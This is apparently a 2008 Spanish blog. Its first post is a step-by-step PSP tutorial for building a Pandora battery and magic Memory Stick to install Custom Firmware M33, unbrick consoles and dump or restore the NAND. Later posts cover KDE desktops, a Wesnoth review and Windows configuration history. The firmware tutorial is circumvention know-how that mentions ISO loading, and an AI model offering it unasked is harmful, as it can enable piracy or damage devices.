  • Instalacion del Despertar del Cementerio v3 o v4
  • Pandorizar Bateria
  • Normalizar Bateria
De momento, nos enfocaremos en usar la versión 2.0 ya que nos instala el ultimo Custom Firmware 3.80 M33-5

TUTORIAL DE USO

Antes que nada, nos descargamos aca la aplicación:

Descarga UltraPandora Installer v2.0

Requisitos:

  • Una bateria original de Sony de la PSP "normal" o Slim (usuarios reportan que no se pueden usar las no originales, aunque os adjuntamos mas abajo una lista de compatibilidad) que sera recuperable. La bateria de la PSP "normal" puede insertarse en la PSP "normal" y en la PSP Slim. La bateria de la PSP Slim solo puede insertarse en la PSP Slim.
  • Una Memory Stick PRO DUO de al menos 256Mb (se recomienda encarecidamente que sea menor a 4Gb, puesto que algunos usuarios reportan que la de 4Gb no sirve, no sirven las Memory Sticks de 32Mb). Esta Memory Stick es completamente recuperable.
  • Una PSP brickeada (no arranca) o con un Firmware oficial de Sony (para hackearla). Da igual el tipo de placa, da igual el tipo de Firmware.
  • Una PSP "sana" "normal" o Slim (la necesitareis OBLIGATORIAMENTE) con el Custom Firmware SE, OE o M33 instalado. Con ella convertiremos una bateria normal en una Pandora's Battery (JigKick). Esta PSP no corre ningun riesgo.
  • En el Menú Recovery de la PSP "sana", dentro de "Configuration", pondremos como "Game folder homebrew" el kernel superior (2.71, 3.40, 3.71, etc...). Este paso no es necesario en PSP Slim (no existe tal opcion).
  • Los archivos de descarga (en cada paso se especifica lo que necesitais).

En resumen:

  • Si vamos a hackear un Firmware Original o reparar la flash a una Slim, necesitaremos una PSP "normal" o PSP Slim con CF ya instalado y la batería de la PSP "normal" o Slim. Sirve la bateria de la PSP Slim.
  • Si vamos a hackear un Firmware Original o reparar la flash a una Fat, necesitaremos una PSP "normal" o PSP Slim con CF ya instalado y la batería de la PSP "normal". No sirve la bateria de la PSP Slim.

Notas

  • En resumen, necesitamos la bateria de la PSP, ya sea para meterla en una PSP que ya tenga Custom Firmware instalado. Crearemos la Stick "magica", y transformamos la bateria.
  • La bateria que modifiquemos no podra usarse como bateria normal a no ser que revirtamos el proceso, lo cual es posible usando este mismo software, se explica mas abajo. Se recomienda que la bateria que useis en este proceso tenga al menos un 75% de bateria, si esta llena, mucho mejor. Al final del tutorial se explica como cargar una bateria Pandora.

Cuando metamos la bateria que hemos modificado y la Memory Stick con los archivos necesarios en la PSP objetivo, arrancara automaticamente, y nos aparecera un menu con varias opciones, entre ellas, la de instalar el Custom Firmware 3.71 M33-2 en nuestra PSP, da igual el Firmware que tengamos (teoricamente sirve también para los Firmwares que aparezcan en el futuro), da igual que la PSP ni siquiera arranque por tener la Flash dañada.

Listado de baterias compatibles (segun MaxConsole)

  • Funcionan
    • Sony's "standard" Li-ion 1800 mAh
    • Datel, PSP Battery 3600 mAh (X2)
    • Datel, PSP Battery 1800 Max Power
    • Datel, PSP Battery GO MAX
    • Sony PSP-280 2200mAh
    • Bateria original de PSP Slim

  • No Funcionan

    • 3.6v 3600 mAh Battery Pack (Silver letters) (Model PSP-360) (Fake)
    • 2600 mAh Mega Battery Pack (Fake)
    • Atomic Battery Pack 3.6V 1800mAh
    • Sony PSP-280 2200mAh (Fake)
    • Sony PSP Bloc-Battery pack 3.6v 1800 mAh
    • Battery 3600mAh, unknown brand, (china made model NK-RH008) (Fake)
    • Battery Pack, unknown brand, (lithium) 3.6v 3600 mAH (Fake)
    • Intec 1800 mAh Li-ion
    • Intec 2200 mAh
    • UltraLast e-Boost 3.7v 2200mAh Li-PO battery

    • Empezando

      Damos por hecho que cumplis los requisitos arriba expuestos. Cogemos "PSP sana" que tiene ya Custom Firmware instalado, la Memory Stick, y la bateria de la PSP que vamos a modificar.

      Preparando la Memory Stick

      Conectamos la PSP al USB del PC, con la Memory Stick de al menos 256Mb dentro. Si teneis datos importantes en la Stick, salvadlos al PC lo primero, pues la vamos a formatear.

      Formateamos la Stick desde el menu Ajustes/Formatear Memory Stick.

      Copiamos a la raiz Memory Stick el contenido del UltraPandora Installer que descargamos con anterioridad.

    Recordamos que este paso debemos hacerlo usando una PSP ya "hackeada". No podeis usar la PSP con firmware oficial.

    Ejecutamos desde el menu juegos el UltraPandora Installer, y nos aparecera este menu:

    Pulsamos X para borrar el contenido de la Memory Stick. Esto hace un formateo logico de la Memory Stick. El programa sale automaticamente.

    Enchuchufamos el USB:

    Copiamos a la raiz Memory Stick lo siguiente (si, copiamos OTRA VEZ el UltraPandora Installer):

Copiamos a la raíz Memory Stick los Updates de 1.50, 3.40 y 3.71 oficiales de Sony, renombrados a 150.pbp, 340.pbp y 371 pbp respectivamente. Los podéis descargar ya renombrados y preparados para copiar directamente en la Memory Stick .

Sacamos la Memory Stick, y damos a Circulo para cerrar la conexion USB.

Creando los archivos necesarios en la Stick

Os recordamos que estos pasos los estamos realizando con la PSP "sana", que tiene Custom Firmware instalado. Con ella conseguireis las herramientas para pasar a 3.71 M33-2 la "otra" PSP, o reparar el brick. No podreis realizar estos pasos con la PSP que quereis hackear, necesitais otra PSP.

Volvemos a introducir la Memory Stick en la PSP y ejecutamos desde el menu Juegos el "UltraPandora Installer". Vamos a la opcion:

Y le damos a X. Salimos del UltraPandora Installer (a la derecha del todo esta la opcion de salir) y ejecutamos desde el menu juegos el "Despertar Del Cementerio". Damos a X. Esto nos crea en la raiz de la Memory Stick archivos necesarios, asi como el msipl.bin.

Nota: Si aparece el mensaje "this progam requires 2.71 or higher", asrguraos de que en el Menú Recovery/Configuration tenéis puesto el Kernel Superior (no 1.50)
Nota: Si aparece un mensaje con lagun error sobre algun .PBP, es que no tenéis instalado en la raíz el Update correspondiente y/o debidamente renombrado.
Nota: Si en este paso la PSP te devuelve un error, asegurate de que tu PSP tiene un Custom Firmware instalado.
Nota: Si os aparece el mensaje " error reading system.dreg" Formatead la Flash1 con la aplicación Format Flash1.

Una vez realizado este proceso, podemos eliminar los archivos 150.pbp y 340.pbp. No serán necesarios para reparar ni hackear ninguna PSP.

Ejecutamos desde el menu juegos el UltraPandora Installer, y vamos a la opcion:

Pulsamos X.

En este preciso momento podemos hacer una copia de seguridad de la Memory Stick, por si quereis utilizar estos archivos en el futuro.

Si teneis la bateria Pandora creada, salimos del UltraPandora Installer. Si la teneis que crear, seguid leyendo.

Creando la Pandora's Battery

Este paso nos lo podemos saltar si ya disponemos de una bateria preparada como Pandora. De lo contrario:

Ejecutamos en la PSP desde el menu Juegos la aplicación "UltraPandora Installer". Vamos al icono de la bateria, y dentro de este:

Pulsamos X para pandorizar la bateria. Vamos a la derecha del todo del menu para salir.

Llegados a este punto, ya tendremos nuestra "Magic Memory Stick" y una "JigKick Battery".

Os recordamos que si habeis modificado la bateria de una PSP "normal", os sirve para introducirla en una PSP "normal" o Slim. Si habeis modificado la bateria de una PSP Slim, solo podreis introducirla en una PSP Slim.

Modo de empleo (si ya teneis la bateria y la Memory Stick "magicas")

  1. Metemos la Memory Stick "magica" en la PSP brickeada, o que va a ser hackeada.
  2. Con el cable de corriente desconectado, mete la "JigKick Battery" (bateria modificada), la PSP deberia encender SOLA.
  3. Aparece un menu, seguimos las instrucciones de pantalla.
    1. Press X to install 3.71 M33-2 => Pulsando X se nos instalaré el Custom Firmware M33 en cualquier PSP (Slim o Fat).
    2. Press O to instal original 3.71 => Pulsando O se nos instalará el Firmware original 3.71.
    3. Press [ ] to dump the nand => Esto nos dumpeará nuestra memoria Flash a la Memory Stick en forma de copia EXACTA.
    4. ***Press L+R+start+home to restore nand dump (dangerous!) = > Esto nos restaurará nuestra memoria Flash (previamente dumpeada) Peligroso! (nota detallada más abajo sobre los peligros de esta opción).
  4. Simplemente, pulsamos X y podremos ver que los leds de Wifi y Memory Stick empiezan a parpadear.
  5. Cómo saber si el proceso ha finalizado:
    • Bastará con fijarse en la pantalla y esperar a que salga el mensaje de Reiniciar la PSP. Metemos la bateria y la Stick "normales" y la reiniciamos.
  6. Proceso Finalizado: Bienvenidos al mundo de la Scene y del Homebrew... de nuevo ;).

Nota importante de Dark_AleX sobre utilizar el dumpeo de la Flash:

***OJO: este proceso es peligroso y solo debe hacerse en caso de extrema emergencia si ninguna otra cosa funciona, y SOLAMENTE usando un dump previamente dumpeado de tu PSP, no uses el DUMP de otra PSP. Al contrario que el restaurador de nand de Pandora, que era un restaurador lógico, este restaurador es físico: intentará hacer un clon 100% exacto del dump. Si el dump de la psp no es tuyo, tendrás un brick o una psp con idstorage corrupto, dependiendo del firmware. Si en el momento de la restauración, tu psp tiene algun bloque dañado más que en el momento del dumpeo, también podrías tener un brick, dependiendo de que bloque se haya dañado. Es por eso que este método solo se aconseja en casos de emergencia o cuando utilizes dumps que has hecho más o menos recientemente."

Tras pulsar X y finalizar el proceso estareis en 3.71 M33 con posibilidad de carga de ISOS y carga limitada de Homebrew, os recomendamos encarecidamente instalar el ultimo Parche kernel 1.50 (solo para PSP "normal") y el Update 3.71 M33-3 para cargar Homebrew al 100% .

Esta misma bateria, y esta misma Memory Stick, nos sirven para realizar el proceso en cuantas PSP's queramos (siempre y cuando, lógicamente, no formateemos la Stick, ni devolvamos la bateria a su estado "normal"). Tendremos una PSP con el Custom Firmware 3.71-2.

Cuando ya tengais el proceso acabado y la PSP funcional, os recomendamos ENCARECIDAMENTE hacer una copia EXACTA de la NAND de vuestra PSP, usando la opcion Cuadrado del menu del Despertar del Cementerio (Press [ ] to dump the nand). Se os creara un archivo en la Stick llamado "nand-dump.bin" que debeis GUARDAR BIEN en vuestro PC, por si lo necesitais en el futuro (sirve para reparar TODOS los bricks por software, pero este archivo sirve SOLO para vuestra PSP, de ahi que sea tan importante hacer una copia propia).

Posibles fallos
  • Si al meter la Stick y la bateria Magicas se enciende el LED de Power pero no aparece nada en pantalla, asegurate de que estas usando una Stick de tamaño adecuado. Si es asi, repite el proceso despacio (metiendo primero la Stick, y luego la bateria, siempre con el cargador desenchufado). Si vuelve a pasarte lo mismo, prueba con otra Stick.
  • Si la PSP muestra el logo de Sony, y despues no aparecen los iconos, o la PSP se bloquea/reinicia tras arrancar, formatead la Flash1: Entra en el modo recovery (manteniendo pulsado R al encender la PSP) al arrancar la consola, vete a advanced y format flash 1, con esto a mi me ha funcionado.
  • Si vuelve otra vez a aparecer el menu del Despertar del Cementerio, mete una Stick "normal" (no magica) y una bateria "standard" (no Pandora)
  • Si al final del proceso aparecen errores del tipo: "ERROR WHILE INITIALIZING: 0x8ca10002" o simplemente no aparece nada en pantalla al meter la bateria y la Stick magicas, comprobad que estais usando una Stick compatible (ver inicio del tutorial) y repetid de nuevo el proceso.

Si quieres que tu bateria y tu Memory Stick sea de nuevo utilizable (paso opcional)

La bateria la podeis guardar asi, tal cual, para realizar otros Downgrades / Unbricks. Pero alguno querra que siga siendo una bateria normal y corriente. Tendreis que hacer lo siguiente.

  • Regresar la bateria a su modo habitual (no Pandora)

Encendemos la PSP sin bateria y sin Memory Stick (enchufamos, logicamente, el cable de corriente). Estando en el XMB, ponemos la bateria Pandora y la Memory Stick. Desde el menu Juegos, ejecutamos el "UltraPandora Installer". Vamos al icono de la bateria, y dentro de este:

Pulsamos X.

Nota de carga de bateria Pandora: Para cargar la bateria Pandora, encendemos la PSP SIN bateria y con el cargador enchufado, metemos la bateria Pandora estando en el XMB, y esperamos a que se cargue.

Para recuperar la Memory Stick basta con que la formateeis desde la PSP, aunque la podeis usar con normalidad si la Bateria no es Pandora.



De momento es todo chavales, este tutorial fue sacado de la comunidad de Beta Pesepe con algunas adaptaciones, así que no se quejen, garantizado que anda en Linux xD

PSP Hacking bajo GNU/Linux

Tal vez algunos vieron el antiguo manual para hackear su PSP.

Bien, ES OBSOLETO, Y ESTÁ MUY MALTRECHO (xD)...

Así que, ahora voy a tener la bondad de ayudarles a hacer modding de su PSP bajo Linux :p

Para empezar, un tutorial para cambiar el firmware de su PSP (tanto Slim como FAT) de el oficial de Sony a un Custom Firmware.

A darle tios xD

lunes, 14 de enero de 2008

Finalizado mi desktop

Para terminarlos de marear con la misma pijada, he aqui el "Release Candidate #1" de mi desktop KDE (y no, yo no hice NINGUN PUTO DESKTOP ENVIRNMENT, KDE NO ES DE MI AUTORIA YO SOLO ESTOY PRESENTANDOLES MI ESCRITORIO, ¿VALE?)

Ya para que paren de joder, les dejo los links xD


Fondo/Wallpaper


Menu K


Navegador Web


Cubo de Escritorio

PD: No es GNOME, es KDE
PPD: Si quieren les paso el tema xD

domingo, 6 de enero de 2008

[JUEGO] The Battle For Wesnoth

Si partimos de la más que probada base de que la palabra gratis provoca un aumento de la atención en el lector, entonces entender el porqué de este análisis. Siendo posiblemente la palabra más buscada en todos los motores de búsqueda que coexisten en nuestra superpoblada red de redes, donde no siempre conseguimos los resultados deseados introduciendo ésta casi mágica unión de vocales y consonantes... pero cuando se obtiene resultado, en ese momento, sabemos que ha valido la pena la búsqueda. El producto de esta profunda búsqueda fue, en esta ocasión, un sencillo título que lleva por homólogo el nombre de The Battle for Wesnoth, un genial juego con licencia libre GNU GPL. Vamos a echarle un vistazo... ¿os parece?.

The Battle for Wesnoth (PC)

Ideado originalmente por David White en verano de 2003, The Battle for Wesnoth surgió como un intento de crear un juego de estrategia por turnos sencillo, del estilo de Master of Monsters o Warsong, de aquella Sega Génesis que muchos aún recordarán y otros pocos conservarán.

The Battle for Wesnoth (PC)
Implementado con reglas muy sencillas pero con una potente inteligencia artificial, la comunidad adepta al software libre no tardó en ver las posibilidades de tan discretamente ambicioso proyecto, y poco a poco, más y más desarrolladores se fueron uniendo para crear el mundo de Wesnoth. Sería finalmente en 2005 cuando la primera versión realmente finalizada del juego vería la luz, para deleite de jugones de todos los rincones del planeta... porque, señoras y señores lectores, The Battle for Wesnoth ha sido traducido, ni más ni menos, que a la nada desdeñable cantidad de 35 idiomas, parcialmente en muchos casos, pero no será por falta de intención. Otra vez más, el software libre demostró que con muchos menos medios se podía llegar a un trabajo superior, en muchos casos, al de algunos de los productos que encontramos en las tiendas, al menos, lingüísticamente hablando.

No contentos con la que ya habían liado, los participantes del proyecto Wesnoth siguieron y siguen hoy en día actualizando, modificando y engrosando la lista de capacidades y virtudes que nos ofrece lo que al ahora líder del proyecto, David White, le parecía en aquel lejano 2003 un intento de emular aquellos juegos que posiblemente tanto le gustaron en su momento.

The Battle for Wesnoth (PC)

Historia universal aparte, vamos a lo que realmente interesa... el juego. Podríamos definir The Battle for Wesnoth como un juego de estrategia por turnos con toques de rol, y haciendo honor a la simplicidad que predican los diseñadores, no extenderemos más esta definición.

Ambientado en el fantástico mundo de, como habréis adivinado, Wesnoth, se nos propone dirigir a uno de los bandos en un amplio número de campañas originalmente diseñadas o incluso un sin fin de batallas individuales. Para lo que ya no se imaginan como era esto cuando lo de jugar contra cualquiera, desde tu propia casa, aún sonaba a ciencia ficción, se nos ofrece la posibilidad de combatir por Wesnoth en un atractivo modo multijugador con partidas de hasta 9 jugadores, e incluso partidas multijugador en el mismo ordenador.

The Battle for Wesnoth (PC)
Desde luego que las alternativas no son pocas, y, ni mucho menos, aburridas. Como tendremos a nuestra elección 6 bandos, y ninguno nos hemos criado en tierras de Wesnoth, se hace necesario que pasemos lista. Antes de nada, diremos que cada bando cuenta con diferentes tipos de tropas, cada una de las cuales utiliza diferentes armas para los distintos tipos de ataque, léase cuerpo a cuerpo, a distancia o mágico. Cada tropa sigue un árbol de mejoras en el que podremos avanzar cuando subamos de nivel con alguna de ellas, y, por supuesto, las tropas supervivientes, como se dice de los que huyen, estarán disponibles para la próxima batalla.

El primero de ellos es el bando de los Rebeldes, pero sin analogía alguna con sus homólogos de las Galaxias, ya que se trata en su mayoría de elfos que reclaman para su señor Konrad el trono que ahora ostenta la malvada reina Asheviere. Las tropas élficas son algo más rápidas de lo normal, especialmente precisas con el arco y muy peligrosas en las zonas boscosas. La Alianza Knalgan se compone de tropas enanas, algo más lentas pero fieras en el combate a cuerpo y expertas en el movimiento por las cavernas y montañas.

The Battle for Wesnoth (PC)
El siguiente bando, los Legitimistas, son los seguidores incondicionales de la reina Asheviere, y por lo tanto, acérrimos enemigos de los Rebeldes. Sus puntos fuertes son su infantería y su poderosa caballería, que los hace ciertamente temibles en las zonas despejadas y a la luz del día. Los Norteños agrupan a orcos, trolls y goblins, su arma principal es la fuerza bruta de la que hacen gala, además de su reducido coste de reclutamiento. Algunos son verdaderamente eficaces atajando por las colinas, y son mucho mejores cuando batallan acogidos bajo el manto de la oscura noche.

The Battle for Wesnoth (PC)
El bando de los No Muertos, se compone, como no podía ser de otra manera, de esqueletos, zombies y almas en pena cuya resistencia física es considerable, pero muy débiles antes los ataques mágicos, y muchas veces basan su estrategia en la superioridad numérica que le otorgan las hordas de zombies. El último, pero no por ello menos importante, de los bandos, son los Drakos, tropas de aspecto draconiano que luchan eficazmente durante el día, y donde muchos de sus miembros son capaces de volar y echar fuego por la boca.

Gráficos
Quien espere unos espectaculares gráficos tridimensionales con multitud de texturas perfectamente utilizadas tiene dos opciones, darle una oportunidad al juego o huir de Wesnoth antes de que los Drakos le alcancen. Por si no estaba claro, los gráficos siguen la misma idea que todo el juego, sencillez. Pero no nos confundamos, sencillez no significa, gráficos penosos, al menos así no sale en mi diccionario, ni que tengamos que poner una parte de interés y tres de imaginación para descifrar lo que ocurre en el juego. Wesnoth usa un modo gráfico plano bidimensional, muy atractivo para la vista, lleno de colorido como no podría ser menos en una tierra tan fantástica.

The Battle for Wesnoth (PC)
El escenario de batalla lo encontraremos dividido en esos hexágonos tan típicos de los wargames tradicionales y de los panales de las abejas. En cada uno de esos hexágonos una unidad, y sólo una, podrá ser ubicada. Así pues el movimiento por turno de cada unidad depende del número de hexágonos que pueda moverse, pero se verá reducido o aumentado por otras causas, sobre todo el terreno y la hora del día, porque en Wesnoth amanece y anochece, que no es poco. Cada zona del mapa, cada hexágono en concreto, representa fielmente el tipo de terreno en el que se encuentra, de una manera inconfundible y muy correcta.

Las tropas sólo podrán enfrentarse contra aquellas que se encuentren en un hexágono adyacente, y atacarán tantas veces como su atributo de número de ataques nos permita. En un combate los atacantes lideran la iniciativa, pero los defensores no se quedan quietos recibiendo de lo lindo, si no que responden con un ataque que sea del mismo tipo que el usado.

The Battle for Wesnoth (PC)
Es decir, si atacamos cuerpo a cuerpo y el defensor tiene ataques cuerpo a cuerpo, nos responderá. Si atacamos con un hechizo y el defensor no sabe hechizos, nos iremos de rositas. Ese es el tema. Por lo tanto se hace imprescindible para el buen general calcular el número de ataques que va a realizar y el daño aproximado que puede producir, además del número de ataques y daño que va a recibir como respuesta.

Poco a poco el jugador irá descubriendo que tropas hacen frente mejor a que enemigos, pero eso, lo proporciona la experiencia. A propósito de las tropas, decir que las representaciones gráficas de cada una, aunque casi inanimadas, son realmente vistosas. No sólo eso, si no que cada avance o mejora de tropa tiene su propia representación, de manera que se nos hará más fácil distinguirlas en la confrontación, tanto a nuestras tropas como a las del enemigo. Como cada tropa tiene un nombre propio, hasta nos podremos encariñar con algunos de nuestros leales servidor.

El interfaz de usuario no podría ser más sencillo, y familiarizarse con el mismo no llevará más tiempo que el que duran dos vistazos. Hablaremos más adelante de sus características de jugabilidad, pero podemos adelantar sin riesgos que, como todo en el juego, no por ser simple es menos bonito. Incluso hay algunas pantallas de introducción que son, en su mayoría, mapas en el que se nos muestra nuestro avance en Wesnoth en los modos de campaña. Sin embargo, los mapas son dignos de cualquier novela de aventuras.

The Battle for Wesnoth (PC)
Mirar el juego desde el punto de vista gráfico y proponer alguna mejora que no afecte en ningún término a la sencillez del juego es tan complicado que no sería de extrañar que la versión gráfica se mantuviera en futuras versiones. Por supuesto que el juego sería muchísimo más atractivo usando motores gráficos de última generación, pero lo que no podríamos asegurar es si el resultado general sería tan positivo como el que actualmente está implementado.

Sonido

The Battle for Wesnoth (PC)
Musicalmente hablando, Wesnoth nos recibirá con una épica marcha de batalla, acertada primera impresión. Y las siguientes no serán menos acertadas. La banda sonora es digna de competir con muchos de los juegos comerciales, melodías correctamente elegidas para cada situación del juego o campaña nos acompañarán durante nuestras confrontaciones.

¿Un fallo en este punto?, aquel del que tantos y tantos títulos pecan, al final se nos hará repetitiva. Tendremos tiempo suficiente hasta que nos aceche esta sensación de "déjà vu" o paramnesia melódica, así que sigamos con un repaso de las cualidades, en el campo del sonido, del título.

Los efectos de combate son variados, y bastante acordes con cada tipo de ataque realizado, sin dejar de ser los tradicionales sonidos de choque de espadas, lanzamiento de flecha o relámpago mágico. Sin embargo, son varios los efectos especiales que adornan este juego: el ya mencionado combate, movimiento, efectos de la interfaz de usuario... todos ellos elegidos con muy buen criterio, que ya es suficiente. No vamos a otorgar ningún premio especial al sonido, pero al menos no se hace tan insufriblemente insoportable como para querer olvidarnos del juego para siempre jamás, por el bien de nuestros pabellones auditivos.

The Battle for Wesnoth (PC)
Si recordáis que hace escasos renglones mencionaba uno de los fallos en el sonido, ahora diré cuál es el segundo. La ausencia total de voces, y que espero ver solventada en futuras versiones. Suponiendo que se pretenda, además, traducirlas a los distintos idiomas, como se hiciera en su momento con los textos, no sería de extrañar que se permitiera a los aficionados a prestar su voz para incluirla en el juego.

Si hay alguien interesado, que vaya preparando sus mejores gritos de guerra élficos o su mejor voz de líder, por si acaso deciden dar a los personajes un poquito más de personalidad por medio de diálogos completamente hablados. No voy a decir que no se echan de menos estas voces, pero seamos sinceros, tampoco nos van a evitar jugar a un título del que ya hemos enumerado tantas virtudes... ¿verdad?.

Jugabilidad

The Battle for Wesnoth (PC)
Siguiendo el principio de simplicidad, la jugabilidad no podía llevarlo al jugador de mejor manera. Cada turno podremos mover todas nuestras tropas según su atributo de movimiento y dependiendo del terreno este se podrá ver reducido. Cada turno tendremos la posibilidad de atacar con alguno de nuestros atacas, generalmente dos, a alguna de las tropas enemigas adyacentes. Y cada turno podremos reclutar nuevas tropas en las fortalezas. ¿Os suena raro?, vamos a explicarlo todo con pelos y señales.

El movimiento es tan simple como seleccionar la unidad que queremos mover y seguidamente el hexágono al que queremos que se mueva. En ese instante nos aparecerá una línea señalando la ruta a seguir, que suele ser la más rápida pero no siempre es la que nosotros queremos, por motivos tácticos. Si se hiciese necesario más de un simple turno para llegar al objetivo, podremos ver en la ruta indicada el número de turnos que tardaremos, e incluso en que punto nos hallaremos al final de cada uno de los mismos mientras dure el viaje. Muy útil.

Si una tropa no mueve absolutamente ni un hexágono en un turno completo, recuperará parte de su vida perdida y, hasta aquí, el movimiento no tiene más secretos, salvo que es importante recordar que tropas son más rápidas en que terrenos a fin de realizar movimientos estratégicos eficientes. Pero no todo en el mapa son bosques, lagos, montañas o praderas... eso que ven mis ojos son, ¿edificios? Pues sí, lo son, y quizás son a su vez el único y más importante recurso estratégico del juego.

The Battle for Wesnoth (PC)

Los edificios tienen dos funciones claras. Cuando una tropa acaba su turno en un edificio recuperará un poquito de la vitalidad perdida en combate, pero además, si una tropa entra en un hexágono de edificio, ocupará ese edificio para nuestra facción. Podremos ver una banderita con el color de nuestro ejército ondeando en el tejado de la casa ocupada y, a partir de entonces, cada turno se nos reportará una cantidad de monedas de oro.

The Battle for Wesnoth (PC)
Se hace imprescindible ocupar gran cantidad de edificios, y no dejar que el enemigo haga lo propio. No es que seamos tacaños, es que ese oro es necesario para reclutar nuevas tropas a nuestro bando y poder hacer frente a las posibles bajas que vayamos sufriendo en el transcurso de la batalla. El reclutamiento es bastante sencillo, se realiza en las fortalezas y sólo tiene una condición, que nuestro líder se encuentre en el torreón principal de la misma. Si esto se cumple, podremos reclutar una tropa por cada hexágono que represente el patio de armas del castillo.

También es posible de esta manera, introducir en la confrontación tropas veteranas de anteriores encuentros, cuya experiencia pueda desnivelar la balanza de la guerra a nuestro favor. Esto es debido a que las tropas ganan experiencia cada vez que combaten, y mucha más ganarán si derrotan al oponente. Una vez acu
The Battle for Wesnoth (PC)The Battle for Wesnoth (PC)mulada cierta cantidad de tan deseada veteranía, la tropa aumentará de rango, y en muchas ocasiones seremos nosotros los responsables de elegir entre dos o tres opciones de mejora para nuestros subordinados. Sabemos movernos, atacar y reclutar tropas, para completar este pequeño aprendizaje os diré que hay tropas con efectos especiales, como los chamanes que pueden curar a los aliados adyacentes, o algunas que se regeneran, como los trolls.

Así que sólo nos falta saber como se gana una batalla. Bien, eso depende... de que batalla sea. No es broma, ya que al
inicio de cada escenario nos habrán asignado unos objetivos. Pueden ir desde derrotar al general del ejército enemigo, llegar con nuestro general a cierto punto o recuperar un objeto, sobrevivir cierto número de turnos o hasta incluso derrotar a más de un general de más de un ejército enemigo.

Sí, en ocasiones nos veremos en clara inferioridad numérica y rodeados por dos o más malvados comandantes que sin piedad lanzan sus tropas contra las nuestras. También en ocasiones aparecerán aliados para socorrernos y prestarnos sus tropas de manera que hacer frente al enemigo se convierta en tarea más sencilla. En el modo multijugador es posible jugar con las alianzas que se estipulen al comienzo de la partida y con cualquier bando, así que variedad de escenarios hay, a decir verdad, pero lo más importante, también hay variedad de campañas.

Serán 6 las campañas a lo largo de las cuales tendremos que probar nuestra valía como generales en Wesnoth. Y esas son solamente las oficiales que se incluyen con el juego, porque hay posibilidad de obtener más campañas gratuitamente o incluso, si alguien se ve con la habilidad suficiente, crearlas. Cada una de ellas nos proporciona una historia completamente original, aunque la duración de cada una varía. En la campaña considerada principal, Heredero al Trono, tomaremos el rol del joven Konrad, que al mando de los rebeldes luchará por reclamar su legitimidad arrebatada por la reina Asheviere y sus secuaces. Todo ellos a lo largo de 24 escenarios diferentes, ni más ni menos.

The Battle for Wesnoth (PC)
En la campaña La Invasión del Este, seremos el oficial Gweddry del ejército del reino de Wesnoth, que tratará por todos los medios, salvar a sus paisanos de la invasión de los No Muertos, durante 17 apasionantes episodios. El Ascenso de Wesnoth nos mostrará como el Príncipe Haldric se convertirá en el fundador y primer rey de Wesnoth, y el Una Historia de Dos Hermanos seremos testigos del rapto del nuestro hermano a manos de un malvado mago. La última de las campañas oficiales es La Guardia del Sur, donde el joven caballero Deovan será asignado como comandante de un grupo conocido como por ese nombre, la Guardia del Sur.

Como podéis ver, hay opciones para todos. De hecho, donde pone para todos, es realmente para todos, porque hay que destacar que The Battle for Wesnoth está disponible para AmigaOS 4, BeOS, FreeBSD, Linux, Mac OS X, NetBSD, OpenBSD, Solaris, RISC OS y, por supuesto Microsoft Windows. Esto significa que no importa que vuestro amigo use otro sistema operativo, ya que podréis jugar tan tranquilamente, independientemente de la plataforma de cada uno. Es una gran noticia para todos que podamos disfrutar de este juego sea cuál sea el sistema operativo que usemos.

The Battle for Wesnoth (PC)
Conclusión

The Battle for Wesnoth (PC)
David White y sus más de 300 colaboradores, en mayor o menor grado, quisieron un día crear un juego sencillo pero altamente jugable. Si nos hubieran prometido que lo conseguirían, a día de hoy nadie podría quitarles ni un ápice de verdad a aquella promesa, y aunque no nos hicieron tal, hoy, casi un millón de jugadores, pueden agradecerles sinceramente que nos hayan llevado durante un instante a ese fantástico mundo que es Wesnoth.

Ojalá sean muchos años los que podamos disfrutar de este título y sus mejoras, porque pocas veces se consigue lo que parece más sencillo, pero es verdaderamente lo más complicado: fijarse un objetivo y cumplirlo tan fielmente que sea posible mirar un juego, a simple vista tan poco sofisticado, y decir con la cabeza bien alta, no le falta, casi nada. Nos vemos en Wesnoth.

Lo mejor
• Gratis/Libre y con un desarrollo altamente activo.
• Busca sencillez y la consigue.
• Variedad en gráficos y campañas.

Lo peor
• Ausencia total de voces.
• Las traducciones son parciales.


Por: José Álvaro Sañudo Díaz

jueves, 3 de enero de 2008

Yet another KDE 3.5 Desktop

Como al parecer no hubo demasiada popularidad en mi anterior desktop, paso a dejar otro, es tan solo un preview así que dejen sus sugerencias (que muy probablemente no tome en cuenta xD)...


Menu KDE/Wallpaper

Firefox

Messenger/Terminal

AmaroK (música)

El error histórico de Microsoft

El error histórico de Microsoft

En MS-DOS, como en UNIX, como en VMS, las aplicaciones se instalaban en un directorio, en el que uno colocaba todos los ejecutables, librerías, archivos de configuración, ficheros de datos, etc. que necesitara el programa para su funcionamiento. Esta metodología era bastante limpia porque permitía tener todo lo necesario en un único lugar del disco. MS-DOS era monousuario y monotarea, es decir, no había más que un usuario en el sistema (más bien el concepto de usuario no existía) y sólo podía ejecutar una aplicación en cada momento. Por tanto sólo había una configración posible, y bastaba con guardar la configuración en un archivo dentro del mismo directorio del programa. Si además la aplicación generaba documentos, como sucede por ejemplo con un procesador de texto, éstos podían guardarse en el mismo directorio también o, mejor, en otro diferente, lo que facilitaba la realización de copias de seguridad.

UNIX (antepasado de linux, por decirlo rápido aunque mal) fue desde el principio un sistema multiusuario y multitarea, de modo que tenía que resolver el problema de cómo guardar la configuración personal de cada usuario para cada programa. Para eso se ideó un tipo especial de archivo, cuyos nombres comenzaban por punto (.) que no aparecía por defecto al mirar los contenidos de un directorio; además cada usuario tenía (tiene) un directorio personal donde guardar sus archivos, incluídos los de configuración.

Este sistema tan simple tiene algunas ventajas que pasan desapercibidas sin una reflexión detenida. Por ejemplo, el tema de los permisos. Un usuario jamás tiene por qué tener permisos de escritura en el directorio donde está el programa con “sus cosas”. Sólo tiene que tener permiso de escritura en sus archivos y sus configuraciones, que cuelgan todos a partir de su directorio de usuario (en linux es /home/nombre-del-usuario). La otra ventaja es que un usuario no tiene por qué tener permiso de lectura (y mucho menos de modificación) de los directorios de los otros usuarios.

Cuando Microsoft desarrolló Windows tuvo que enfrentarse a nuevos problemas, para los que posiblemente reflexionó poco. Y alguna mente privilegiada de redmon pensó: “creemos el win.ini”, un archivo donde guardar la configuración de Windows. Y más adelante ¿por qué no creamos un servicio en el API de Windows para que los desarrolladores añadan la configuración de sus propios programas al win.ini, y así centralizamos todo? Hay que pensar que en su primera época Windows todavía era monousuario y su sistema de archivos (FAT) no permitía asignar permisos a los ficheros.

